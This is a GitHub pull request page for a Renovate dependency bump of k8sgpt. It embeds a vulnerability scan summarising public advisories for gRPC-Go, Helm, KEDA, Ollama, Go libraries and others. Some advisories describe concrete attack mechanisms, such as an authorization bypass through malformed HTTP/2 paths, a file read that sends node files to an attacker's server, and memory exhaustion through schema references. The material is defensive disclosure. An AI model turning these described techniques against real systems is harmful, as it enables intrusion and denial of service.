You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
uniget-bot
changed the title
chore(deps): update dependency k8sgpt-ai/k8sgpt to v0.4.28
chore(deps): update dependency k8sgpt-ai/k8sgpt to v0.4.30
Feb 20, 2026
uniget-bot
changed the title
chore(deps): update dependency k8sgpt-ai/k8sgpt to v0.4.30
chore(deps): update dependency k8sgpt-ai/k8sgpt to v0.4.31
Mar 24, 2026
A critical authentication bypass vulnerability exists in Ollama platform's API endpoints in versions prior to and including v0.12.3. The platform exposes multiple API endpoints without requiring authentication, enabling remote attackers to perform unauthorized model management operations.
Affected range
>=0
Fixed version
Not Fixed
Description
Ollama Divide By Zero vulnerability in github.com/ollama/ollama
Affected range
>=0
Fixed version
Not Fixed
Description
Ollama Allocation of Resources Without Limits or Throttling vulnerability in github.com/ollama/ollama
Affected range
>=0
Fixed version
Not Fixed
Description
Ollama Denial of Service (DoS) via Null Pointer Dereference in github.com/ollama/ollama
Affected range
>=0
Fixed version
Not Fixed
Description
Ollama Divide by Zero Vulnerability in github.com/ollama/ollama
Affected range
>=0
Fixed version
Not Fixed
Description
Ollama Vulnerable to Denial of Service (DoS) via Crafted GZIP in github.com/ollama/ollama
Affected range
>=0
Fixed version
Not Fixed
Description
Ollama Allows Out-of-Bounds Read in github.com/ollama/ollama
Affected range
>=0
Fixed version
Not Fixed
Description
Ollama vulnerable to Cross-Domain Token Exposure in github.com/ollama/ollama
google.golang.org/grpc1.73.0 (golang)
pkg:golang/google.golang.org/grpc@1.73.0
Improper Authorization
Affected range
<1.79.3
Fixed version
1.79.3
CVSS Score
9.1
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Description
Impact
What kind of vulnerability is it? Who is impacted?
It is an Authorization Bypass resulting from Improper Input Validation of the HTTP/2 :path pseudo-header.
The gRPC-Go server was too lenient in its routing logic, accepting requests where the :path omitted the mandatory leading slash (e.g., Service/Method instead of /Service/Method). While the server successfully routed these requests to the correct handler, authorization interceptors (including the official grpc/authz package) evaluated the raw, non-canonical path string. Consequently, "deny" rules defined using canonical paths (starting with /) failed to match the incoming request, allowing it to bypass the policy if a fallback "allow" rule was present.
Who is impacted?
This affects gRPC-Go servers that meet both of the following criteria:
They use path-based authorization interceptors, such as the official RBAC implementation in google.golang.org/grpc/authz or custom interceptors relying on info.FullMethod or grpc.Method(ctx).
Their security policy contains specific "deny" rules for canonical paths but allows other requests by default (a fallback "allow" rule).
The vulnerability is exploitable by an attacker who can send raw HTTP/2 frames with malformed :path headers directly to the gRPC server.
Patches
Has the problem been patched? What versions should users upgrade to?
Yes, the issue has been patched. The fix ensures that any request with a :path that does not start with a leading slash is immediately rejected with a codes.Unimplemented error, preventing it from reaching authorization interceptors or handlers with a non-canonical path string.
Users should upgrade to the following versions (or newer):
v1.79.3
The latest master branch.
It is recommended that all users employing path-based authorization (especially grpc/authz) upgrade as soon as the patch is available in a tagged release.
Workarounds
Is there a way for users to fix or remediate the vulnerability without upgrading?
While upgrading is the most secure and recommended path, users can mitigate the vulnerability using one of the following methods:
1. Use a Validating Interceptor (Recommended Mitigation)
Add an "outermost" interceptor to your server that validates the path before any other authorization logic runs:
funcpathValidationInterceptor(ctx context.Context, reqany, info*grpc.UnaryServerInfo, handler grpc.UnaryHandler) (any, error) {
ifinfo.FullMethod==""||info.FullMethod[0] !='/' {
returnnil, status.Errorf(codes.Unimplemented, "malformed method name")
}
returnhandler(ctx, req)
}
// Ensure this is the FIRST interceptor in your chains:=grpc.NewServer(
grpc.ChainUnaryInterceptor(pathValidationInterceptor, authzInterceptor),
)
2. Infrastructure-Level Normalization
If your gRPC server is behind a reverse proxy or load balancer (such as Envoy, NGINX, or an L7 Cloud Load Balancer), ensure it is configured to enforce strict HTTP/2 compliance for pseudo-headers and reject or normalize requests where the :path header does not start with a leading slash.
3. Policy Hardening
Switch to a "default deny" posture in your authorization policies (explicitly listing all allowed paths and denying everything else) to reduce the risk of bypasses via malformed inputs.
golang.org/x/crypto0.40.0 (golang)
pkg:golang/golang.org/x/crypto@0.40.0
Affected range
<0.43.0
Fixed version
0.43.0
Description
SSH clients receiving SSH_AGENT_SUCCESS when expecting a typed response will panic and cause early termination of the client process.
Allocation of Resources Without Limits or Throttling
Affected range
<0.45.0
Fixed version
0.45.0
CVSS Score
5.3
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
Description
SSH servers parsing GSSAPI authentication requests do not validate the number of mechanisms specified in the request, allowing an attacker to cause unbounded memory consumption.
Out-of-bounds Read
Affected range
<0.45.0
Fixed version
0.45.0
CVSS Score
5.3
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
Description
SSH Agent servers do not validate the size of messages when processing new identity requests, which may cause the program to panic if the message is malformed due to an out of bounds read.
helm.sh/helm/v33.17.4 (golang)
pkg:golang/helm.sh/helm/v3@3.17.4
Affected range
<3.18.4
Fixed version
3.18.4
Description
Helm vulnerable to Code Injection through malicious chart.yaml content in helm.sh/helm
Allocation of Resources Without Limits or Throttling
Affected range
<3.18.5
Fixed version
3.18.5
CVSS Score
6.5
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
Description
A Helm contributor discovered that it was possible to craft a JSON Schema file in a manner which could cause Helm to use all available memory and have an out of memory (OOM) termination.
Impact
A malicious chart can point $ref in values.schema.json to a device (e.g. /dev/*) or other problem file which could cause Helm to use all available memory and have an out of memory (OOM) termination.
Patches
This issue has been resolved in Helm v3.18.5.
Workarounds
Make sure that all Helm charts that are being loaded into Helm doesn't have any reference of $ref pointing to /dev/zero.
References
Helm's security policy is spelled out in detail in our SECURITY document.
Credits
Disclosed by Jakub Ciolek at AlphaSense.
Use of Uninitialized Resource
Affected range
<3.18.5
Fixed version
3.18.5
CVSS Score
6.5
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
Description
A Helm contributor discovered an improper validation of type error when parsing Chart.yaml and index.yaml files that can lead to a panic.
Impact
There are two areas of YAML validation that were impacted. First, when a Chart.yaml file had a null maintainer or the child or parent of a dependencies import-values could be parsed as something other than a string, helm lint would panic. Second, when an index.yaml had an empty entry in the list of chart versions Helm would panic on interactions with that repository.
Patches
This issue has been resolved in Helm v3.18.5.
Workarounds
Ensure YAML files are formatted as Helm expects prior to processing them with Helm.
References
Helm's security policy is spelled out in detail in our SECURITY document.
Credits
Disclosed by Jakub Ciolek at AlphaSense.
stdlib1.24.13 (golang)
pkg:golang/stdlib@1.24.13
Affected range
<1.25.8
Fixed version
1.25.8
Description
url.Parse insufficiently validated the host/authority component and accepted some invalid URLs.
Affected range
<1.25.8
Fixed version
1.25.8
Description
Actions which insert URLs into the content attribute of HTML meta tags are not escaped. This can allow XSS if the meta tag also has an http-equiv attribute with the value "refresh".
A new GODEBUG setting has been added, htmlmetacontenturlescape, which can be used to disable escaping URLs in actions in the meta content attribute which follow "url=" by setting htmlmetacontenturlescape=0.
Affected range
<1.25.8
Fixed version
1.25.8
Description
On Unix platforms, when listing the contents of a directory using File.ReadDir or File.Readdir the returned FileInfo could reference a file outside of the Root in which the File was opened.
The impact of this escape is limited to reading metadata provided by lstat from arbitrary locations on the filesystem without permitting reading or writing files outside the root.
The Delete function fails to properly validate offsets when processing malformed JSON input. This can lead to a negative slice index and a runtime panic, allowing a denial of service attack.
Affected range
>=0.0.0
Fixed version
Not Fixed
Description
The Delete function fails to properly validate offsets when processing malformed JSON input. This can lead to a negative slice index and a runtime panic, allowing a denial of service attack.
An Arbitrary File Read vulnerability has been identified in KEDA, potentially affecting any KEDA resource that uses TriggerAuthentication to configure HashiCorp Vault authentication.
The vulnerability stems from an incorrect or insufficient path validation when loading the Service Account Token specified in spec.hashiCorpVault.credential.serviceAccount.
An attacker with permissions to create or modify a TriggerAuthentication resource can exfiltrate the content of any file from the node's filesystem (where the KEDA pod resides) by directing the file's content to a server under their control, as part of the Vault authentication request.
The potential impact includes the exfiltration of sensitive system information, such as secrets, keys, or the content of files like /etc/passwd.
Patches
The problem has been patched in v2.17.3 and 2.18.3 as well as in main branch.
Workarounds
The only effective workaround is the strict restriction of permissions for creating and modifying TriggerAuthentication resources within the Kubernetes cluster.
Only trusted and authorized users should have create or update permissions on the TriggerAuthentication resource.
This limits an attacker's ability to configure a malicious TriggerAuthentication with an arbitrary path.
Is my project affected?
If it execute s
kubectl get deploy keda-operator -n keda -o jsonpath="{.spec.template.spec.containers[0].image}"
and the version is not 2.17.3, 2.18.3 or >= 2.19.0, that version is affected.
go.opentelemetry.io/otel/sdk1.36.0 (golang)
pkg:golang/go.opentelemetry.io/otel/sdk@1.36.0
Untrusted Search Path
Affected range
>=1.21.0 <1.40.0
Fixed version
1.40.0
CVSS Score
7
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
Description
Impact
The OpenTelemetry Go SDK in version v1.20.0-1.39.0 is vulnerable to Path Hijacking (Untrusted Search Paths) on macOS/Darwin systems. The resource detection code in sdk/resource/host_id.go executes the ioreg system command using a search path. An attacker with the ability to locally modify the PATH environment variable can achieve Arbitrary Code Execution (ACE) within the context of the application.
Patches
This has been patched in d45961b, which was released with v1.40.0.
Docker CLI for Windows searches for plugin binaries in C:\ProgramData\Docker\cli-plugins, a directory that does not exist by default. A low-privileged attacker can create this directory and place malicious CLI plugin binaries (docker-compose.exe, docker-buildx.exe, etc.) that are executed when a victim user opens Docker Desktop or invokes Docker CLI plugin features, and allow privilege-escalation if the docker CLI is executed as a privileged user.
This issue affects Docker CLI through v29.1.5 (fixed in v29.2.0). It impacts Windows binaries acting as a CLI plugin manager via the github.com/docker/cli/cli-plugins/manager package, which is consumed by downstream projects such as Docker Compose.
Docker Compose became affected starting in v2.31.0, when it incorporated the relevant CLI plugin manager code (see docker/compose#12300), and is fixed in v5.1.0.
This issue does not impact non-Windows binaries or projects that do not use the plugin manager code.
Patches
Fixed version starts with 29.2.0
This issue was fixed in docker/cli@1375933 (docker/cli#6713), which removed %PROGRAMDATA%\Docker\cli-plugins from the list of paths used for plugin-discovery on Windows.
Nitesh Surana (niteshsurana.com) of Trend Research of TrendAI
golang.org/x/net0.42.0 (golang)
pkg:golang/golang.org/x/net@0.42.0
Affected range
<0.45.0
Fixed version
0.45.0
Description
The html.Parse function in golang.org/x/net/html has an infinite parsing loop when processing certain inputs, which can lead to denial of service (DoS) if an attacker provides specially crafted HTML content.
Affected range
<0.45.0
Fixed version
0.45.0
Description
The html.Parse function in golang.org/x/net/html has quadratic parsing complexity when processing certain inputs, which can lead to denial of service (DoS) if an attacker provides specially crafted HTML content.
A padding oracle vulnerability exists in the AWS S3 Crypto SDK for GoLang versions prior to V2. The SDK allows users to encrypt files with AES-CBC without computing a Message Authentication Code (MAC), which then allows an attacker who has write access to the target's S3 bucket and can observe whether or not an endpoint with access to the key can decrypt a file, they can reconstruct the plaintext with (on average) 128*length (plaintext) queries to the endpoint, by exploiting CBC's ability to manipulate the bytes of the next block and PKCS5 padding errors. It is recommended to update your SDK to V2 or later, and re-encrypt your files.
Affected range
>=0
Fixed version
Not Fixed
Description
A vulnerability in the in-band key negotiation exists in the AWS S3 Crypto SDK for GoLang versions prior to V2. An attacker with write access to the targeted bucket can change the encryption algorithm of an object in the bucket, which can then allow them to change AES-GCM to AES-CTR. Using this in combination with a decryption oracle can reveal the authentication key used by AES-GCM as decrypting the GMAC tag leaves the authentication key recoverable as an algebraic equation. It is recommended to update your SDK to V2 or later, and re-encrypt your files.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
nicholasdille-bot
left a comment
uniget-bot
force-pushed
the
renovate/k8sgpt-ai-k8sgpt-0.4.x
branch
from
This PR contains the following updates:
0.4.27→0.4.31Warning
Some dependencies could not be looked up. Check the Dependency Dashboard for more information.
Release Notes
k8sgpt-ai/k8sgpt (k8sgpt-ai/k8sgpt)
v0.4.31Compare Source
Features
Other
Docs
v0.4.30Compare Source
Bug Fixes
v0.4.29Compare Source
Features
Bug Fixes
b8788ab(#1572) (a56e478)Refactoring
v0.4.28Compare Source
Features
Bug Fixes
Other
93cb6ef(#1592) (40ffcbe)40f1582(#1593) (a303ffa)Configuration
📅 Schedule: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 Ignore: Close this PR and you won't be reminded about this update again.
This PR has been generated by Renovate Bot.